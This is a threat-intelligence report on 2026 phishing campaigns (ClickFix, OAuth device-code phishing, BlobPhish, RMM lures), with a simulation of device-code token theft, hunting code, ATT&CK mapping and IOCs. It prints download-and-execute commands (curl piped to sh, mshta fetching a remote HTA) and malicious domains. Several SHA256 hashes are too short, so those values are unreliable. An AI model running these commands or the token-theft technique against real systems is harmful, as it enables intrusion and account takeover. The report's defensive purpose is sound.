
Top 5 Phishing-Driven Social Engineering Attacks on Companies in 2026

Modern social engineering attacks have evolved to closely mimic legitimate business workflows, utilizing techniques like ClickFix, OAuth device code abuse, and in-browser blob phishing. These tactics bypass traditional security controls and create "gray-zone" alerts that require deep behavioral analysis to determine the true scope of compromise, such as credential theft, token abuse, or RMM deployment.

Confidence: high | Analyzed: 2026-05-24
Campaigns / tooling: BlobPhish, ClickFix, EvilTokens, AMOS
Source: ANY.RUN
IOCs: 25

What Happened

Cybercriminals are using highly convincing fake login pages, AI tool instructions, and event invitations to trick employees into giving up access to company systems. These attacks affect anyone using standard business tools like Microsoft 365, banking portals, or AI assistants. This matters because these modern phishing techniques often bypass standard security filters and can lead to stolen passwords, financial fraud, or remote control of company computers. Organizations should ensure their security teams have the tools to quickly analyze suspicious links and behaviors before a minor click turns into a major breach.

Key Takeaways

  • Modern social engineering closely mimics legitimate workflows, such as Microsoft logins, AI tool documentation, and event invitations, making detection difficult.
  • ClickFix attacks abuse employee trust in AI tools (like Claude or Grok) to trick users into manually running malicious terminal commands.
  • OAuth device code phishing (EvilTokens) skips credential theft altogether: the victim enters an attacker-generated code on the legitimate device-login page, and the attacker's client receives the resulting access and refresh tokens.
  • Banking phishing campaigns (BlobPhish) render the login page from a blob: URL created inside the browser, so the form never exists at a fetchable URL that URL filtering or network inspection could match.
  • Fake event invitations are increasingly used as lures to deliver Remote Monitoring and Management (RMM) tools for persistent access.

Affected Systems

  • Windows
  • macOS
  • Microsoft 365
  • Web Browsers

Attack Chain

Attackers utilize highly convincing social engineering lures, such as fake Microsoft logins, AI tool documentation, or event invitations, delivered via email or web redirects. Victims are tricked into interacting with these pages, which may use in-browser blob objects to evade detection or abuse OAuth device code flows to steal access tokens directly. In ClickFix scenarios, users are prompted to manually copy and paste malicious commands into their terminal, leading to the execution of stealers like AMOS on macOS or remote access tools on Windows. The final impact ranges from credential and token theft to full endpoint compromise and lateral movement.
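The device code abuse in the chain above, as an added simulation that is not from the ANY.RUN article: a toy identity provider implementing the RFC 8628 device authorization grant, an attacker acting as the OAuth client, and a victim who enters the user code on the genuine verification page and passes MFA. The endpoint names, client id, user, credentials, the sign-in log shape (modelled on the authentication-protocol field Entra sign-in logs expose) and the block_device_code_flow policy switch are all assumptions of this example.

```python
"""Toy model of OAuth device code phishing (RFC 8628 device authorization grant).
Everything here is constructed for illustration: the identity provider, the
client id, the user, and the sign-in log shape are assumptions of this example."""
import secrets
import string


class ToyIdP:
    """Stand-in identity provider with an optional policy that refuses
    device code flow (modelled on a Conditional Access style control)."""

    def __init__(self, block_device_code_flow: bool = False):
        self.block_device_code_flow = block_device_code_flow
        self.pending = {}        # device_code -> request state
        self.by_user_code = {}   # user_code   -> device_code
        self.signin_log = []     # what the defender later sees
        self.users = {"alice@example.com": {"password": "hunter2", "totp": "123456"}}

    def device_authorization(self, client_id: str, scope: str) -> dict:
        """Step 1 (attacker): ask for a device_code / user_code pair.
        No user has interacted yet, so nothing is logged against any account."""
        device_code = secrets.token_hex(16)
        user_code = "-".join(
            "".join(secrets.choice(string.ascii_uppercase) for _ in range(4)) for _ in range(2))
        self.pending[device_code] = {"client_id": client_id, "scope": scope,
                                     "subject": None, "denied": False}
        self.by_user_code[user_code] = device_code
        return {"device_code": device_code, "user_code": user_code,
                "verification_uri": "https://login.example.test/devicelogin",
                "interval": 5, "expires_in": 900}

    def verify_user_code(self, user_code, username, password, totp, ip) -> str:
        """Step 2 (victim): types the user_code on the *real* login page and
        authenticates there. MFA is performed and satisfied; the attacker never
        sees the password or the one-time code."""
        device_code = self.by_user_code.get(user_code)
        if device_code is None:
            return "invalid_code"
        user = self.users.get(username)
        if user is None or user["password"] != password:
            return "invalid_credentials"
        if totp != user["totp"]:
            return "mfa_failed"
        req = self.pending[device_code]
        blocked = self.block_device_code_flow
        self.signin_log.append({"user": username, "ip": ip, "client_id": req["client_id"],
                                "authenticationProtocol": "deviceCode",
                                "mfa": "satisfied",
                                "result": "blocked_by_policy" if blocked else "success"})
        if blocked:
            req["denied"] = True
            return "blocked_by_policy"
        req["subject"] = username
        return "approved"

    def token(self, device_code: str) -> dict:
        """Step 3 (attacker): poll the token endpoint with the device_code."""
        req = self.pending.get(device_code)
        if req is None:
            return {"error": "invalid_grant"}
        if req["denied"]:
            return {"error": "access_denied"}
        if req["subject"] is None:
            return {"error": "authorization_pending"}
        return {"access_token": "at-" + secrets.token_hex(8),
                "refresh_token": "rt-" + secrets.token_hex(8),
                "sub": req["subject"], "scope": req["scope"], "client_id": req["client_id"]}


def run_phish(block_device_code_flow: bool = False) -> dict:
    """Drive one phishing attempt end to end and return what each side ended up with."""
    idp = ToyIdP(block_device_code_flow)
    # Attacker presents itself as an ordinary mail client (placeholder client id).
    codes = idp.device_authorization(client_id="mail-desktop-client",
                                     scope="openid offline_access Mail.Read")
    # The lure (e.g. a fake meeting invite) carries codes["verification_uri"]
    # and codes["user_code"]; the victim is told to "enter this code to join".
    first_poll = idp.token(codes["device_code"])
    victim_outcome = idp.verify_user_code(codes["user_code"], "alice@example.com",
                                          "hunter2", "123456", ip="203.0.113.7")
    second_poll = idp.token(codes["device_code"])
    return {"first_poll": first_poll, "victim_outcome": victim_outcome,
            "tokens": second_poll, "signin_log": idp.signin_log}


if __name__ == "__main__":
    for policy in (False, True):
        r = run_phish(block_device_code_flow=policy)
        print(f"block_device_code_flow={policy}: victim={r['victim_outcome']}, "
              f"attacker got={r['tokens']}")
```

Two things to notice in the output: the attacker's first poll is refused with authorization_pending and succeeds only after the victim has authenticated, and the sign-in record the defender sees reads as a fully MFA-satisfied sign-in for the victim. The only distinguishing signal is the authentication protocol (device code) combined with which client and from where, which is why the hunting hypothesis for this technique keys on those fields rather than on MFA failures.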

Detection Availability

  • YARA Rules: No
  • Sigma Rules: Yes
  • Snort/Suricata Rules: Yes
  • KQL Queries: No
  • Splunk SPL Queries: No
  • EQL Queries: No
  • Other Detection Logic: No
  • Platforms: Sigma, Suricata, ANY.RUN

The article and accompanying images indicate that Sigma and Suricata rules are available within the ANY.RUN platform to detect the observed phishing and malware behaviors.

Detection Engineering Assessment

  • EDR Visibility: High. Post-click execution is noisy: mshta.exe fetching an external URL, curl output piped into sh, and RMM installers appearing right after browsing activity are all visible in process telemetry.
  • Network Visibility: Medium. Connections to known-bad infrastructure are catchable, but BlobPhish pages are assembled inside the browser and device code phishing talks only to legitimate Microsoft endpoints, so both blend into normal traffic.
  • Detection Difficulty: Moderate. The lures mimic legitimate workflows and ride trusted services (OAuth, AI tool documentation), so the initial click is hard to catch; the subsequent terminal commands or RMM installation provide clear behavioral signals.

Required Log Sources

  • Process Creation (Event ID 4688 / Sysmon Event ID 1)
  • DNS Queries
  • Proxy/Web Gateway Logs
  • Cloud identity logs (Entra ID sign-in logs, including the authentication protocol field that marks device code sign-ins, plus application consent audit events)

Hunting Hypotheses

  • Hypothesis: mshta.exe executing with an external HTTP/HTTPS URL in its command line, which may indicate ClickFix or similar payload delivery. Telemetry: process creation logs. ATT&CK stage: Execution. FP risk: Low.
  • Hypothesis: users executing curl commands that pipe output directly to sh or bash, especially when the command contains base64-encoded strings, as seen in macOS ClickFix attacks. Telemetry: macOS Unified Logs / EDR process telemetry. ATT&CK stage: Execution. FP risk: Medium.
  • Hypothesis: unusual OAuth device code authentication flows in cloud identity logs, particularly those originating from unexpected locations or resulting in new application consents. Telemetry: cloud identity/authentication logs. ATT&CK stage: Credential Access. FP risk: Medium.
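The three hypotheses above as executable hunting logic, an added example rather than ANY.RUN's own Sigma or Suricata content. The process and sign-in events are constructed samples in a simplified schema (an assumption; map the field names to your EDR export and Entra sign-in logs), and the corporate egress range and approved-application list are placeholders.

```python
"""Hunting logic for the three hypotheses above, run over constructed sample
telemetry. The event shapes are a simplified composite (an assumption), not a
specific EDR or Entra export schema; map the field names to your own pipeline."""
import base64
import re
from ipaddress import ip_address, ip_network

# ---- constructed sample telemetry -----------------------------------------
B64_URL = base64.b64encode(b"https://example.test/payload").decode()

PROCESS_EVENTS = [
    # Windows ClickFix: mshta fetching a remote HTA (same shape as the page's IOC)
    {"os": "windows", "host": "WS-104", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://download-version.1-4-9.com/x", "parent": "explorer.exe"},
    # Benign mshta: local HTA spawned by an installer
    {"os": "windows", "host": "WS-211", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r"mshta C:\ProgramData\Vendor\setup.hta", "parent": "msiexec.exe"},
    # macOS ClickFix: URL hidden in base64, decoded in a subshell, piped into sh
    {"os": "macos", "host": "mbp-17", "image": "/usr/bin/curl",
     "cmdline": f"curl -sKfSL $(echo '{B64_URL}' | base64 -d) | sh", "parent": "zsh"},
    # Benign curl: saves to disk, nothing is executed
    {"os": "macos", "host": "mbp-03", "image": "/usr/bin/curl",
     "cmdline": "curl -fsSL https://pkg.example.test/tool.sh -o /tmp/tool.sh", "parent": "zsh"},
]

SIGNIN_EVENTS = [  # field names modelled on Entra sign-in logs (assumption)
    {"user": "alice@example.com", "ip": "203.0.113.7", "appId": "mail-desktop-client",
     "authenticationProtocol": "deviceCode", "mfa": "satisfied"},
    {"user": "bob@example.com", "ip": "198.51.100.20", "appId": "mail-desktop-client",
     "authenticationProtocol": "password", "mfa": "satisfied"},
    {"user": "carol@example.com", "ip": "198.51.100.22", "appId": "mail-desktop-client",
     "authenticationProtocol": "deviceCode", "mfa": "satisfied"},
]
CORP_EGRESS = [ip_network("198.51.100.0/24")]        # placeholder office range
APPROVED_DEVICE_CODE_APPS = {"mail-desktop-client"}  # placeholder allowlist

# ---- detection logic --------------------------------------------------------
REMOTE_URL = re.compile(r"\bhttps?://", re.IGNORECASE)
CURL_PIPE_SHELL = re.compile(r"\bcurl\b.*\|\s*(?:sudo\s+)?(?:ba|z)?sh\b")
B64_SUBSHELL = re.compile(r"echo\s+'([A-Za-z0-9+/=]+)'\s*\|\s*base64\s+(?:-d|-D|--decode)")


def decode_embedded_b64(cmdline: str):
    """Return the decoded string if the command decodes a base64 literal inline."""
    m = B64_SUBSHELL.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


def hunt_processes(events):
    """H1: mshta with a remote URL. H2: curl piped into a shell interpreter."""
    findings = []
    for e in events:
        cmd = e["cmdline"]
        if e["image"].lower().endswith("mshta.exe") and REMOTE_URL.search(cmd):
            findings.append({"hypothesis": "H1-mshta-remote-url", "host": e["host"],
                             "fp_risk": "low", "cmdline": cmd})
        elif CURL_PIPE_SHELL.search(cmd):
            findings.append({"hypothesis": "H2-curl-pipe-shell", "host": e["host"],
                             "fp_risk": "medium", "cmdline": cmd,
                             "decoded_url": decode_embedded_b64(cmd)})
    return findings


def hunt_device_code_signins(events, corp_ranges, approved_apps):
    """H3: device code sign-ins from outside corporate egress or via an
    unapproved client. MFA status is deliberately NOT used as a filter,
    because the victim satisfies MFA in this flow."""
    findings = []
    for s in events:
        if s["authenticationProtocol"] != "deviceCode":
            continue
        src = ip_address(s["ip"])
        offnet = not any(src in net for net in corp_ranges)
        unknown_app = s["appId"] not in approved_apps
        if offnet or unknown_app:
            findings.append({"hypothesis": "H3-device-code-flow", "user": s["user"],
                             "fp_risk": "medium", "offnet": offnet,
                             "unknown_app": unknown_app, "ip": s["ip"]})
    return findings


if __name__ == "__main__":
    for f in hunt_processes(PROCESS_EVENTS) + hunt_device_code_signins(
            SIGNIN_EVENTS, CORP_EGRESS, APPROVED_DEVICE_CODE_APPS):
        print(f)
```

The benign rows are there on purpose: a local HTA launched by an installer and a curl that only writes to disk fall through, which is what keeps H1 at low FP risk. H2 also surfaces the decoded URL so the analyst does not have to decode the base64 by hand, and H3 stays medium-risk because legitimate CLI tooling from inside the office range is expected to use device code flow.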

Control Gaps

  • Traditional URL filtering: BlobPhish renders the page from a blob: URL created inside the browser, and several lures sit on abused legitimate services, so there is no malicious URL for the filter to match.
  • Standard MFA: in OAuth device code phishing the victim completes MFA on the genuine login page while authorizing the attacker's session, so MFA is satisfied rather than defeated and the resulting tokens still go to the attacker.

Key Behavioral Indicators

  • Execution of mshta.exe with remote URLs
  • Piping curl output to shell interpreters on macOS
  • Unexpected RMM tool installations (ScreenConnect, ITarian) following web browsing activity

False Positive Assessment

  • Medium. While the specific IOCs are highly malicious, hunting for generic behaviors like OAuth device code flows or RMM tool usage may yield false positives in environments where these are used legitimately.

Recommendations

Immediate Mitigation

  • Verify against your organization's incident response runbook and team escalation paths before acting.
  • Consider blocking the identified malicious domains and IP addresses at the perimeter.
  • Evaluate whether recent alerts involving mshta.exe or unusual curl commands warrant immediate endpoint isolation.

Infrastructure Hardening

  • If supported by your identity provider, restrict OAuth application consent to admin-approved applications only, and review existing consents for unfamiliar apps.
  • Use Conditional Access to block device code flow outright, or scope it to the specific users, devices and locations that genuinely need it (Entra ID exposes device code flow as an authentication-flows condition), and alert on any device code sign-in outside that scope.

User Protection

  • Consider restricting the execution of mshta.exe and other LOLBins on user endpoints if they are not required for business operations.
  • Web filtering cannot see a blob: page, because it is generated by JavaScript inside the browser rather than fetched from a URL; if applicable, evaluate browser-level controls (browser isolation, enterprise browser policies, or extensions that inspect rendered content) rather than relying on URL or network inspection alone.

Security Awareness

  • Consider updating security awareness training to include examples of ClickFix attacks, emphasizing the danger of copying and pasting terminal commands from unverified sources.
  • Evaluate whether employees are trained to recognize OAuth device code prompts and the risks of authorizing unknown applications.

MITRE ATT&CK Mapping

  • T1566.002 - Phishing: Spearphishing Link
  • T1059.004 - Command and Scripting Interpreter: Unix Shell
  • T1059.001 - Command and Scripting Interpreter: PowerShell
  • T1218.005 - System Binary Proxy Execution: Mshta
  • T1528 - Steal Application Access Token
  • T1555.001 - Credentials from Password Stores: Keychain
  • T1074.001 - Data Staged: Local Data Staging
  • T1071 - Application Layer Protocol
  • T1204.004 - User Execution: Malicious Copy and Paste
  • T1219 - Remote Access Tools

Additional IOCs

  • IPs:
    • 147[.]45[.]179[.]206 - IP address hosting malicious payloads
    • 62[.]133[.]62[.]234 - IP address hosting malicious payloads
  • Domains:
    • loginmicr0sft0nlineeckaf[.]52632651246148569845521065[.]cc - Fake Microsoft login domain
    • segyen[.]xyz - Malicious domain observed in threat intelligence lookup
    • addossernugkrsqjfa[.]seconddomain[.]su - Malicious domain observed in threat intelligence lookup
    • ofdocwwdwewewedsd2i232[.]pagedemo[.]co - Malicious domain observed in threat intelligence lookup
    • download-version[.]1-4-9[.]com - Domain hosting ClickFix Windows payloads
    • mtl-logistics[.]com - Domain hosting BlobPhish lures
    • legendarysinvited[.]de - Domain hosting fake event invitations
  • Urls:
    • hxxps://is[.]gd/4kZgry - Malicious redirect URL used in OAuth phishing
    • hxxps://github[.]com/shaundretta78/f/blob/main/chang - Abused legitimate infrastructure hosting malicious content
  • File Hashes:
    • 90FE524E6E7361F7E8832F8D88AF335BC6B9561AFB86F4FEB59D5DF859F2EB5E (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 315F08A314E299D30BE098D1D42BB11A818AE39963ED0801F3632F41504F45C (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 33AD558D5B96F97496C5CAB18D32EFBF1DDC0927E219DA488E58F7BEBF5744A7 (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 83CC2EF6C031FCCC14C8D259C140EF8452359CF6F1667C07177AC1332901D23 (SHA256) - Malicious file hash observed in threat intelligence lookup
    • B3A23896DF77441FBAC8E4F392953D22C0818583BA4DA443C5200863CCB2048C (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 5904778365F988CCF2C5148F42A4D13636C381407239ADC243300E9C879B956 (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 05E801351F3E5CE008625356C47C82080A9F64CBC14432C35A361AF44DABAD (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 2FEF7B04A3CC49C4649789669CDC8463AC2E3FA47D9C3988F99369DC26BA6486 (SHA256) - Malicious file hash observed in threat intelligence lookup
    • 03644A5B2B94EA498BB45EFABFB6FC3CA7870505742A3BE32FA3E9B768025D32 (SHA256) - Malicious file hash observed in threat intelligence lookup
    • E188E259FD6CC501108F203718852A50EA9F02B7721E56CBE3D0256740A1154F (SHA256) - Malicious file hash observed in threat intelligence lookup
  • Command Lines:
    • Purpose: Download and execute macOS payload via base64 encoded URL in ClickFix attack | Tools: curl, sh | Stage: Execution | curl -sKfSL $(echo '
    • Purpose: Execute remote HTA payload on Windows in ClickFix attack | Tools: mshta | Stage: Execution | mshta https://download-version.1-4-9.com/